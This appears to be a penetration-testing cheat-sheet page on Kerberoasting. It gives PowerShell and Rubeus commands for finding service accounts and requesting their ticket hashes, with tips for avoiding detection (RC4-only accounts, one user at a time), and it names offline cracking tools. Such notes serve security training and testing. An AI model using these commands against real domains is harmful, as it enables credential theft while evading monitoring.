Kerberoasting
#

Look for user accounts that are used as Service Accounts and have a SPN set.
Since kerberoast relies on password cracking, we won’t look for machine accounts as they usually use safe password that would make cracking them difficult/unsuccessful.

{% code title=“PowerShell AD Module” %}

Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName

{% endcode %}

The chances we have at cracking AES128/256 are low, and passing a RC4 hash for user accounts for which AES is supported would trigger an Encryption Downgrade alert.
Good practice is to look for accounts that only support RC4_HMAC to possibly avoid detection.

Rubeus.exe kerberoats /stats /simple /rc4opsec

{% code title=“Rubeus.exe” %}

Rubeus.exe kerberoats /stats /simple /rc4opsec

{% endcode %}

Requesting many different TGS in rapid succession is seen as an anomalous behaviour and could be detected. Better to avoid kerberoasting all accounts at once.

Insecure:

Rubeus.exe kerberoast /rc4opsec /outfile:<path_to_file>

More Secure:

Rubeus.exe kerberoast /user:<SamAccountName> /simple /rc4opsec

We can now proceed to feed the hash to John the Ripper or Hashcat to execute a Dictionary Attack, or Hydra for brute-forcing.

Kerberoasting #

Kerberoasting
#